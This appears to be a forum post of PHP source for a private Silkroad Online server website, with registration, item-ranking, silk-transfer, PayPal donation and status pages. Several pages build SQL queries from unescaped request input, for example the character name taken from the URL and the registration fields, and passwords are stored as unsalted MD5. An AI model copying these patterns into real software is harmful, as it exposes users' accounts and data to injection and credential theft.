<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Character Items</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><b>Char Name</b></td>
<td><b>Image</b></td>
<td><b>Item Name</b></td>
<td><b>Type</b></td>
<td><b>Level</b></td>
<td><b>Plus Value</b></td>
</tr>
<?php $query = core::$sql -> exec("
select top 50 it.OptLevel, ch.CharName16, obj.AssocFileIcon128, obj.Country, obj.CodeName128, obj.ReqLevel1 , item.ItemClass , adv.nOptValue ,es.EndTextString
from _Items as it
LEFT JOIN [dbo].[_Inventory] as inv ON it.ID64 = inv.ItemID
LEFT JOIN [dbo].[_Char] as ch ON inv.CharID = ch.CharID
LEFT JOIN [dbo].[_RefObjCommon] as obj ON it.RefItemID = obj.ID
LEFT JOIN [dbo].[_RefObjItem] as item ON obj.Link = item.ID
LEFT JOIN [dbo].[_BindingOptionWithItem] as adv ON it.ID64 = adv.nItemDBID
LEFT JOIN [dbo].[C_EquipStrings] as es on obj.NameStrID128 = es.TextString
where ch.CharName16 is not NULL and CodeName128 not like '%stone%' and CharName16 not like '%]%'
ORDER BY it.OptLevel DESC, obj.ReqLevel1 DESC, item.ItemClass DESC, adv.nOptValue DESC
");
while ($row = mssql_fetch_array($query)){?>
<tr>
<td align="center"><a href="?pg=rank&type=char&name=<?php echo $row['CharName16'];?>"><?php echo $row['CharName16'];?></a></td>
<td align="center"><img src="./<?php echo $row['AssocFileIcon128'];?>.png" width="32" height="32" alt=""/></td>
<td><?php echo $row['EndTextString'];?></td>
<?php $totalvalue = $row['OptLevel']+$row['nOptValue'];
$advonly = $row['nOptValue'];
$itemclass = $row['ItemClass'];
switch($itemclass) {
case 1:
echo '<td>Normal</td>';
break;
case 2:
echo '<td>Seal Of Moon</td>';
break;
case 3:
echo '<td>Seal Of Sun</td>';
break;
case 4:
echo '<td>Normal</td>';
break;
case 5:
echo '<td>Seal Of Moon</td>';
break;
case 6:
echo '<td>Seal Of Sun</td>';
break;
case 7:
echo '<td>Normal</td>';
break;
case 8:
echo '<td>Seal Of Star</td>';
break;
case 9:
echo '<td>Seal Of Moon</td>';
break;
case 10:
echo '<td>Seal Of Sun</td>';
break;
case 11:
echo '<td>Normal</td>';
break;
case 12:
echo '<td>Seal Of Star</td>';
break;
case 13:
echo '<td>Seal Of Moon</td>';
break;
case 14:
echo '<td>Seal Of Sun</td>';
break;
case 15:
echo '<td>Normal</td>';
break;
case 16:
echo '<td>Seal Of Star</td>';
break;
case 17:
echo '<td>Seal Of Moon</td>';
break;
case 18:
echo '<td>Seal Of Sun</td>';
break;
case 19:
echo '<td>Normal</td>';
break;
case 20:
echo '<td>Seal Of Star</td>';
break;
case 21:
echo '<td>Seal Of Moon</td>';
break;
case 22:
echo '<td>Seal Of Sun</td>';
break;
case 23:
echo '<td>Normal</td>';
break;
case 24:
echo '<td>Seal Of Star</td>';
break;
case 25:
echo '<td>Seal Of Moon</td>';
break;
case 26:
echo '<td>Seal Of Sun</td>';
break;
case 27:
echo '<td>Normal</td>';
break;
case 28:
echo '<td>Seal Of Star</td>';
break;
case 29:
echo '<td>Seal Of Moon</td>';
break;
case 30:
echo '<td>Seal Of Sun</td>';
break;
default:
echo '<td>Normal</td>';
break;
}
echo '<td align="center">'.$row['ReqLevel1'].'</td>';
echo '<td>'.$totalvalue.'';
switch($advonly) {
case "NULL":
break;
case 1:
echo '+(1) ADV</td>';
break;
case 2:
echo '+(2) ADV</td>';
break;
}
echo '</tr>';
}?>
</tr>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
case('set_char'):
$nCharName = $_GET['name'];
core::$sql -> changeDB("shard");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Character Items</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Character Items</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><b>Char Name</b></td>
<td><b>Image</b></td>
<td><b>Item Name</b></td>
<td><b>Type</b></td>
<td><b>Level</b></td>
<td><b>Plus Value</b></td>
</tr>
<?php $query = core::$sql -> exec("
select it.OptLevel, ch.CharName16, obj.AssocFileIcon128, obj.Country, obj.CodeName128 ,obj.ReqLevel1 , item.ItemClass , adv.nOptValue ,es.EndTextString
from _Items as it
LEFT JOIN [dbo].[_Inventory] as inv ON it.ID64 = inv.ItemID
LEFT JOIN [dbo].[_Char] as ch ON inv.CharID = ch.CharID
LEFT JOIN [dbo].[_RefObjCommon] as obj ON it.RefItemID = obj.ID
LEFT JOIN [dbo].[_RefObjItem] as item ON obj.Link = item.ID
LEFT JOIN [dbo].[_BindingOptionWithItem] as adv ON it.ID64 = adv.nItemDBID
LEFT JOIN [dbo].[C_EquipStrings] as es on obj.NameStrID128 = es.TextString
where ch.CharName16 = '$nCharName' and inv.Slot between 0 and 12 and inv.Slot != 8
");
while ($row = mssql_fetch_array($query)){
echo '<tr>';
echo '<td align="center"><a href="?pg=rank&type=char&name='.$row['CharName16'].'">'.$row['CharName16'].'</a></td>';
if($row['AssocFileIcon128'] == 'xxx'){
echo '<td><img src="./item/clean.png" width="32" height="32" alt=""/></td>';
} else {
echo '<td><img src="./'.$row['AssocFileIcon128'].'.png" width="32" height="32" alt=""/></td>';
}
if($row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$row['EndTextString'].'</td>';
}
$totalvalue = $row['OptLevel']+$row['nOptValue'];
$advonly = $row['nOptValue'];
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
$itemclass = $row['ItemClass'];
switch($itemclass) {
case 27:
echo '<td>Normal</td>';
break;
case 28:
echo '<td>Seal Of Star</td>';
break;
case 29:
echo '<td>Seal Of Moon</td>';
break;
case 30:
echo '<td>Seal Of Sun</td>';
break;
default:
echo '<td>Normal</td>';
break;
}}
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$row['ReqLevel1'].'</td>';
}
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$totalvalue.'';
switch($advonly) {
case "NULL":
break;
case 1:
echo '+(1) ADV</td>';
break;
case 2:
echo '+(2) ADV</td>';
break;
}}
echo '</tr>';
}?>
</table>
<?php echo misc::back();?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
// Default Page (Without Page Selected) .
default:
{
//list functions
break;
}
}
?>
reg
كود PHP:
<?php
global $core;
if(isset($_GET['ref']))
{
if(security::isSecureString($_GET['ref'], 3) && $core -> aConfig['allowRefferals'] == 1)
{
$_SESSION['ref'] = $_GET['ref'];
}
}
if(isset($_POST['submit']) && $_POST['submit'] != 'login')
{
$errors = array();
if(strlen($_POST['username']) > 16) $errors[] = "Username too long";
if(strlen($_POST['username']) < 3) $errors[] = "Username too short";
if(strlen($_POST['pass1']) > 32) $errors[] = "Password [1] too long";
if(strlen($_POST['pass1']) < 6) $errors[] = "Password [1] too short";
if(strlen($_POST['pass2']) > 32) $errors[] = "Password [2] too long";
if(strlen($_POST['pass2']) < 6) $errors[] = "Password [2] too short";
if(strlen($_POST['email']) > 54) $errors[] = "Email too long";
if(strlen($_POST['email']) < 6) $errors[] = "Email too short";
/******** Answers Sec *********/
if(strlen($_POST['sec_question']) > 54) $errors[] = "Security Question too long";
if(strlen($_POST['sec_question']) < 3) $errors[] = "Security Question too short";
if(strlen($_POST['sec_answer']) > 54) $errors[] = "Security Answer too long";
if(strlen($_POST['sec_answer']) < 3) $errors[] = "Security Answer too short";
if(!security::isSecureString($_POST['username'], 3)) $errors[] = "Username field contains forbidden symbols";
if(!security::isSecureString($_POST['pass1'], 3)) $errors[] = "Password [1] field contains forbidden symbols";
if(!security::isSecureString($_POST['pass2'] ,3)) $errors[] = "Password [2] field contains forbidden symbols";
if(!security::isSecureString($_POST['email'], 2)) $errors[] = "Email field contains forbidden symbols";
if(!security::isCorrectEmail($_POST['email'])) $errors[] = "Invalid email address";
if($_POST['pass1'] != $_POST['pass2']) $errors[] = "Password fields dosent match";
if(count($errors) > 0)
{?>
<!--=== Content Part ===-->
<div class="body">
<div class="breadcrumbs margin-bottom-50">
<div class="container">
<h1 class="color-green pull-left">Register</h1>
<ul class="pull-right breadcrumb">
<li><a href="/">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Registration</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post">
<h3>Register a new account</h3>
<?php for($i = 0; $i < count($errors); $i++)
{?>
<p><?php echo $errors[$i].".<br/>";?></p>
<?php }?>
</form>
</div><!--/row-fluid-->
</div><!--/container-->
</div><!--/body-->
<!--=== End Content Part ===-->
<?php }
else
{
if(user::accountExists($_POST['username']) == 1)
{?>
<!--=== Content Part ===-->
<div class="body">
<div class="breadcrumbs margin-bottom-50">
<div class="container">
<h1 class="color-green pull-left">Register</h1>
<ul class="pull-right breadcrumb">
<li><a href="/">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Registration</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post">
<h3>Register a new account</h3>
<p>This username is already taken.</p>
</form>
</div><!--/row-fluid-->
</div><!--/container-->
</div><!--/body-->
<!--=== End Content Part ===-->
<?php }
else
{
core::$sql -> exec("insert into TB_User(StrUserID,password,reg_ip,sec_content,sec_primary, email) values('$_POST[username]','".md5($_POST['pass1'])."','".$_SERVER['REMOTE_ADDR']."','3','3','$_POST[email]')");
$nJID = user::accountJIDbyUsername($_POST['username']);
$szAvatarDefault = "img/noavatar.png";
core::$sql -> exec("insert into srcms_userprofiles(JID,gender,skype,sec_question,sec_answer,avatar,whois, ispublic) values('$nJID','0','None','$_POST[sec_question]','$_POST[sec_answer]','$szAvatarDefault','user','1')");
core::$sql -> exec("insert into SK_Silk(JID,silk_own,silk_gift,silk_point) values('$nJID','".$core -> aConfig['startSilk']."','0','0')");
if(isset($_SESSION['ref']))
{
if($_SESSION['ref'] == $_SESSION['username'])
{
echo "<br/>You can't be refferer for your own account (but account created).<br/>";
return;
}
$reffererJID = user::accountJIDbyUsername($_SESSION['ref']);
if($reffererJID > 0)
{
$nRefIPs = core::$sql -> numRows("select * from srcms_refferals where IP='".$_SERVER[REMOTE_ADDR]."'");
if($nRefIPs < $core -> aConfig['maxRefAccIP'])
{
$datetime = gmDate('Y-m-d H:i:s');
core::$sql -> exec("insert into srcms_refferals(reffererJID,invitedUserJID,time,ip) values('$reffererJID','$nJID','$datetime','$_SERVER[REMOTE_ADDR]')");
unset($_SESSION['ref']);
}
}
}
$sName = $core -> aConfig['serverName'];
@mail($_POST['email'],"Thanks for registering at $sName","Thanks for registering at $sName, we really hope you will have a great fun playing here.","From:$noreply@$sName");?>
<!--=== Content Part ===-->
<div class="body">
<div class="breadcrumbs margin-bottom-50">
<div class="container">
<h1 class="color-green pull-left">Register</h1>
<ul class="pull-right breadcrumb">
<li><a href="/">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Registration</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post">
<h3>Register a new account</h3>
<p>You have successfully registered you account, thank you for joining Rival-Online.</p>
</div><!--/row-fluid-->
</div><!--/container-->
</div><!--/body-->
<!--=== End Content Part ===-->
<?php misc::redirect("?pg=Home", 5);
}
}
}
else
{
//todo:add ajax validator
?>
<!--=== Content Part ===-->
<div class="body">
<div class="breadcrumbs margin-bottom-50">
<div class="container">
<h1 class="color-green pull-left">Register</h1>
<ul class="pull-right breadcrumb">
<li><a href="/">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Registration</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post" role="form">
<h3>Register a new account</h3>
<div class="controls">
<label>Username <span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-user"></i></span>
<input type="text" name="username" autocomplete="off" maxlength="16" placeholder="User Name" style="width: 165%" class=""/>
</div>
<label>Email Address <span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-envelope"></i></span>
<input type="email" name="email" autocomplete="off" maxlength="54" placeholder="Email" style="width: 165%" class=""/>
</div>
</div>
<div class="controls">
<div class="span6">
<label>Password <span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-lock"></i></span>
<input type="password" name="pass1" autocomplete="off" maxlength="32" placeholder="Password" style="width: 80%" class=""/>
</div>
</div>
<div class="span6">
<label>Confirm Password <span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-lock"></i></span>
<input type="password" name="pass2" autocomplete="off" maxlength="32" placeholder="Confirm Password" style="width: 80%" class=""/>
</div>
</div>
</div>
<div class="controls">
<label>Security Question <span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-question-sign"></i></span>
<input type="text" autocomplete="off" maxlength="16" placeholder="Security Question" name="sec_question" style="width: 165%" class=""/>
</div>
<label>Security Answer <span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-info-sign"></i></span>
<input type="text" autocomplete="off" maxlength="16" placeholder="Security Answer" name="sec_answer" style="width: 165%" class=""/>
</div>
</div>
<!--div>
<label>Are you human ? <span class="color-red">*</span></label>
<script type="text/javascript">
var RecaptchaOptions = {
theme : 'clean'
};
</script>
<center><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LeBrO8SAAAAAHKPgsJuYPS1vViiXLElqixSq3zc"></script>
<noscript>
<iframe src="http://www.google.com/recaptcha/api/noscript?k=6LeBrO8SAAAAAHKPgsJuYPS1vViiXLElqixSq3zc" height="300" width="500" frameborder="0"></iframe><br/>
<textarea name="recaptcha_challenge_field" rows="3" cols="40"></textarea>
<input type="hidden" name="recaptcha_response_field" value="manual_challenge"/>
</noscript></center>
<br>
</div-->
<div class="controls form-inline">
<label class="checkbox"><input type="checkbox" /> I read <a href="?pg=tos">Terms and Conditions</a></label>
<input type="submit" name="submit" class="btn-u pull-right" value="Register">
</div>
<hr />
<p>Already Signed Up? Click <a href="?pg=Login" class="color-green">Sign In</a> to login your account.</p>
</form>
</div><!--/row-fluid-->
</div><!--/container-->
</div><!--/body-->
<!--=== End Content Part ===-->
<?php
}
?>
rules
كود PHP:
<table border='1' id='table-3' cellpadding='0' cellspacing='0'>
<tr>
<td>1. Botting is allowed! (Gold Botting with or without Proxies is forbidden)</td>
</tr>
<tr>
<td>2. The Team should be treated with respect! rules must be followed!</td>
</tr>
<tr>
<td>3. Don't insult other Players, be friendly!</td>
</tr>
<tr>
<td>4. Begging for Items or Events is not allowed!</td>
</tr>
<tr>
<td>5. PK2 Editing are completely forbidden!</td>
</tr>
<tr>
<td>6. If you found a bug , you must report it and not use it.!</td>
</tr>
<tr>
<td>7. Murder on Events is not allowed!</td>
</tr>
</table>
sendsilks
كود PHP:
<?php
function check_pers ($per,$total){
// $num = ceil($snum);
$total = ceil($total);
$num = ceil($total * $per) / 100 ;
return ($num);
}
if (isset($_POST['sendsilk'])) {
// $user = $sec->secure($_POST['username']);
$email = security::secure($_POST['name']);
$amont = security::secure($_POST['amont']);
//$check = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$user."'");
if (empty($_POST['amont']) || (empty($_POST['name']) )) {
echo 'Error:';
echo '<br />';
echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
unset($_POST['sendsilk']);
}
if(user::accountExists($email) == 1) {
echo '
Error
<br />
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;"> character name !!! </span></label>
';
} else {
$IDs = user::accountJIDbyUsername($_SESSION['username']);
$silk_own = user::getSilkByUsername($IDs);
if (($_POST['amont']) > $silk_own) {
echo 'Error :';
echo '<br />';
echo "You do not have $amont silk";
} else {
if (($_POST['amont']) < 10) {
echo '
Error
<br />
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;"> You can`t send less than 10 silk !!! </span></label>
';
} else {
if (($_POST['name']) == ($_SESSION['username'])) {
echo '
<div class="top">Error</div>
<br />
<form method="POST">
<label>You can`t send to <span style="color: red;font-weight:bold;font-size: medium;"> '.($_SESSION['username']).'</span></label>
';
} else {
function check_($val)
{
if( $val % 2 == 0 )
{
return false;
}
else
{
return true;
}
}
if (check_($amont)) {
echo '<div id="content">
<div class="top">Error</div>
<div class="content">
<div id="content" class="content-inner">
<form method="POST">
<div class="reg">
<label><span style="color: red;font-weight:bold;font-size: medium;">$amont is an odd number ... No single number can be written so that a discount of 10% of the figure</span></label>
</div>
</div>
</div>
<div class="bottom"></div>
</div>
</div>
';
} else {
$per = $amont;
$num = 10;
$nsba100 = check_pers($per,$num);
$checkID = user::accountJIDbyUsername($email);
$silk_own = user::getSilkByUsername($IDs);
while ($row = mssql_fetch_array($checkID)) {
$IDs = $row['JID'];
}
$checkID = user::accountJIDbyUsername($_SESSION['username']);
while ($row = mssql_fetch_array($checkID)) {
$IIDs = $row['JID'];
core::$sql -> exec("update SK_Silk set silk_own = silk_own - '".$amont."' WHERE JID = '".$IIDs."'");
core::$sql -> exec("update SK_Silk set silk_own = silk_own + '".$amont."' - '".$nsba100."' WHERE JID = '".$IDs."'");
}
echo '
sent successfully !
<br />
<form method="POST">
<br />
<label><span style="color: green;font-weight:bold;font-size: medium;">'.$amont.' silks sent successfully</span></label>
';
}
}
}
}
}
}
else {
//}
// $user = $sec->secure($_POST['username']);
//$check = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$user."'");
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = mssql_fetch_array($checkID)) {
$IDs = $row['JID'];
}
$silk_own = user::getSilkByUsername($IDs);
echo '
Send Silk system .
<form name="registerform" id="formID" method="post" autocomplete="off" >
<span style="color: #FF0000;font-weight:bold; font-size: 15px; "> 10%</span> <span style="font-weight:bold; font-size: 15px; ">will be deducted from the Silk sender</span><br /><br />
<table width="70%" style="text-align:center;align:center;margin-left:15%;">
<tr>
<td > <br /><p style="font-size : 13px;"> Enter your Silk :</p></td>
<td > <br /><p style="font-size : 13px;"><input type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;" name="amont" value="" /></p></td>
</tr>
<tr>
<td > <br /><p style="font-size : 13px;"> Send To (Username) :</p></td>
<td > <br /><p style="font-size : 13px;"><input type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;" name="name" value="" /></p></td>
</tr>
</table>
<table>
<td >
<br/><input style="height:32px;vertical-align:middle;margin-left: 150px;" class="submitButton" type="submit" value="send silk" name="sendsilk" />
</td>
</table>
';
}
?>
sendsilks1
كود PHP:
<?php
core::$sql -> changeDB("acc");
function check_pers($per,$total){
// $num = ceil($snum);
$total = ceil($total);
$num = ceil($total * $per) / 100 ;
return ($num);
}
if (isset($_POST['sendsilk'])) {
$useridnum = security::secure($_POST['name']);
$amount = security::secure($_POST['amount']);
if (empty($_POST['amount']) || (empty($_POST['name']) )) {
echo 'Error:<br />';
echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
unset($_POST['sendsilk']);
}
core::$sql -> changeDB("acc");
$checkcs = core::$sql -> numRows("SELECT * FROM TB_User WHERE StrUserID = '".$useridnum."'");
if ($checkcs != 1) {
echo '
Error
<br />
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;"> character name !!! </span></label>
<br />
';
} else {
core::$sql -> changeDB("acc");
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$querys = core::$sql -> exec("select * from SK_Silk where JID = '".$IDs."'");
while ($row = core::$sql -> fetchArray($querys)) {
$silk_own = $row['silk_own'];
}
if (($_POST['amount']) > $silk_own) {
echo 'Error :';
echo '<br />';
echo "You do not have $amount silk";
} else {
if (($_POST['amount']) < 10) {
echo '
Error
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;"> You can`t send less than 10 silk !!! </span></label>
';
} else {
if (($_POST['name']) == ($_SESSION['username'])) {
echo '
Error:
<form method="POST">
<label>You can`t send to <span style="color: red;font-weight:bold;font-size: medium;"> '.($_SESSION['username']).'</span></label>
';
} else {
function check_($val)
{
if( $val % 2 == 0 )
{
return false;
}
else
{
return true;
}
}
if (check_($amount)) {
echo '
Error
<br />
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;">$amount is an odd number ... No single number can be written so that a discount of 10% of the figure</span></label>
';
} else {
core::$sql -> changeDB("acc");
$per = $amount;
$num = 10;
$nsba100 = check_pers($per,$num);
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$useridnum."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$checkIID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkIID)) {
$IIDs = $row['JID'];
core::$sql -> changeDB("acc");
core::$sql -> exec("update SK_Silk set silk_own = silk_own - '".$amount."' WHERE JID = '".$IIDs."'");
core::$sql -> exec("update SK_Silk set silk_own = silk_own + '".$amount."' - '".$nsba100."' WHERE JID = '".$IDs."'");
}
echo '
successfully
<form method="POST">
<label><span style="color: green;font-weight:bold;font-size: medium;">Send '.$amount.' silk successfully</span></label>
';
}
}
}
}
}
}
else {
core::$sql -> changeDB("acc");
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$querys = core::$sql -> exec("select * from SK_Silk where JID = '".$IDs."'");
while ($row = core::$sql -> fetchArray($querys)) {
$silk_own = $row['silk_own'];
}
echo '
Send Silk System
<form name="registerform" id="formID" method="post" autocomplete="off" >
<span style="color: #FF0000;font-weight:bold; font-size: 15px; "> 10%</span> <span style="font-weight:bold; font-size: 15px; ">will be deducted from the Silk sender</span><br /><br />
<table width="70%" style="text-align:center;align:center;margin-left:15%;">
<tr>
<td ><br /><p style="font-size : 13px;"> Enter your Silk :</p></td>
<td ><br /><p style="font-size : 13px;"><input class="validate[required,custom[onlyNumberSp],minSize[0],maxSize[14],ajax[ajaxUserCallPhpSilk]] textboxt" type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;" name="amount" value="" /></p></td>
</tr>
<tr>
<td ><br /><p style="font-size : 13px;"> Send To (Username) :</p></td>
<td ><br /><p style="font-size : 13px;"><input type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;" name="name" value="" class="validate[required,minSize[4],maxSize[16]] textboxt" /></p></td>
</tr>
</table>
<table> <td ><br/> <input style="height:32px;vertical-align:middle;margin-left: 150px;" class="submitButton" type="submit" value="send silk" name="sendsilk" /></td>
</table>
</form>
';
}
?>
shop
كود PHP:
<?php
global $core;
$servername = $core -> aConfig['serverName'];
$getsiteurl = $_SERVER['SERVER_NAME'];
$username = $_SESSION['username'];
?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Donate</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Donate</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<table width='100%' height='422' border='1' align='center' cellpadding='0' cellspacing='0'>
<tbody>
<form name='_xclick' action='https://www.paypal.com/cgi-bin/webscr' method='post'>
<input type='hidden' name='cmd' value='_xclick' />
<input type='hidden' name='business' value='[email protected]' />
<input type='hidden' name='currency_code' value='USD' />
<input type='hidden' id='input' name='custom' value='<?php echo $username;?>' />
<input type='hidden' name='item_name' value='Rival-Online Online Goods - Virtual Points in [<?php echo $servername;?>] User :[<?php Echo $username;?>] '/>
Hello <font style='color:red;'><?php echo $username;?> </font>, Please Choose the Amount of Silks: <br />
<select style='color:red;background: rgba(0,0,0,4.0);width:250px;' name='amount'>
<option style='color:red' value='5' name='1 x 300 Silk (USD 5.00)'>300 Silk (USD 5.00)
<option style='color:red' value='10' name='1 x 700 Silk (USD 10.00)'>700 Silk (USD 10.00)
<option style='color:red' value='15' name='1 x 1100 Silk (USD 15.00)'>1100 Silk (USD 15.00)
<option style='color:red' value='25' name='1 x 2000 Silk (USD 25.00)'>2000 Silk (USD 25.00)
<option style='color:red' value='50' name='1 x 4500 Silk (USD 50.00)'>4500 Silk (USD 50.00)
</select>
<input type='hidden' name='return' value='http://<?php echo $getsiteurl;?>/?pg=news'>
<input type='hidden' name='notify_url' value='http://<?php echo $getsiteurl;?>/module/ipn.php'>
<input style='width: 99px;vertical-alignt:midle;border:none;' type='image' src='http://www.paypalobjects.com/en_US/i/btn/btn_buynow_LG.gif' name='submit' alt='PayPal - The safer, easier way to pay online!' />
</form>
<br /><br />
<b>Before you continue with the silks charge you must agree that you wont ChargeBack and also that you read those Terms of Use :</b><br />
<a href='?pg=tos'>Terms and Conditions</a>
</tbody>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
stats_menu
كود PHP:
<?php
$data = $core -> aConfig;
$hGwStatus = @fsockopen($data['serverIP'], $data['gatewayPort'], $errno, $errstr, 0.3);
$hGsStatus = @fsockopen($data['serverIP'], $data['gamePort'], $errno, $errstr, 0.3);
$hStatuses = array();
$onlineImg = "<img src='img/status/online.gif' />";
$offlineImg = "<img src='img/status/offline.gif' />";
if($hGwStatus) { $hStatuses['gw'] = $onlineImg; }
else { $hStatuses['gw'] = $offlineImg; }
if($hGsStatus) { $hStatuses['gs'] = $onlineImg; }
else { $hStatuses['gs'] = $offlineImg; }
$nOnlinePlayers = misc::getOnlinePlayersCount();
core::$sql -> changeDB('acc');
$nAccounts = core::$sql -> getRow("select count(*) from TB_User");
$nPlayersMax = core::$sql -> getRow("SELECT top 1 nUserCount FROM _ShardCurrentUser WHERE nShardID = '".$core -> aConfig['shardID']."' ORDER BY nUserCount desc");
core::$sql -> changeDB('shard');
$nChars = core::$sql -> getRow("select count(*) from _Char");
$nGuilds = core::$sql -> getRow("select count(*) from _Guild");
core::$sql -> changeDB('acc');
echo "
<hr>
<b> Server info :</b><br/>
<hr>
Players online: <font color='green'>$nOnlinePlayers/$data[playersLimit]</font><br/>
Max online: <font color='green'>$nPlayersMax</font><br/>
Experience rate: <font color='green'>$data[expRate]</font><br/>
Party Experience rate: <font color='green'>$data[partyExpRate]</font><br/>
Gold drop coeficent: <font color='green'>$data[goldDropRate]</font><br/>
Item drop coeficent: <font color='green'>$data[itemDropRate]</font><br/>
<hr>
<b>Status :</b><br/>
<hr>
Gateway Server: $hStatuses[gw]<br/>
Game Server: $hStatuses[gs]<br/>
Accounts: <font color='green'>$nAccounts</font><br/>
Characters: <font color='green'>$nChars</font><br/>
Guilds: <font color='green'>$nGuilds</font>
";
?>
ucp
كود PHP:
<?php
global $core;
if(isset($_SESSION['username']))
{
//core::$ucp -> showMenu();
#echo "You are logged in as <b>$_SESSION[username]</b>.<br/><br/>";
if(isset($_GET['act']))
{
switch($_GET['act'])
{
case('changepw'):
{
//module disabled
if($core -> aConfig['allowChangePw'] == 0)
{
echo $core -> aConfig[0];
echo "This module is currently disabled.";
return;
}
if(isset($_POST['submit']))
{
//process data
if(!security::isSecureString($_POST['password_old'], 3)) $errors[] = "Password [old] contains forbidden symbols";
if(!security::isSecureString($_POST['password_new'], 3)) $errors[] = "Password [new] contains forbidden symbols";
if(strlen($_POST['password_old']) > 32) $errors[] = "Password [old] too long";
if(strlen($_POST['password_old']) < 6) $errors[] = "Password [old] too short";
if(strlen($_POST['password_new']) > 32) $errors[] = "Password [new] too long";
if(strlen($_POST['password_new']) < 6) $errors[] = "Passwrod [new] too short";
if($_POST['password_new'] !== $_POST['password_new_confirm']) $errors[] = "New Passwords does not match!.";
if(count($errors) > 0)
{
foreach($errors as $nElement)
{
echo $nElement.".<br/>";
}
misc::back();
}
else
{
//verify
if(user:: changePassword($_SESSION['username'], $_POST['password_old'], $_POST['password_new']))
{
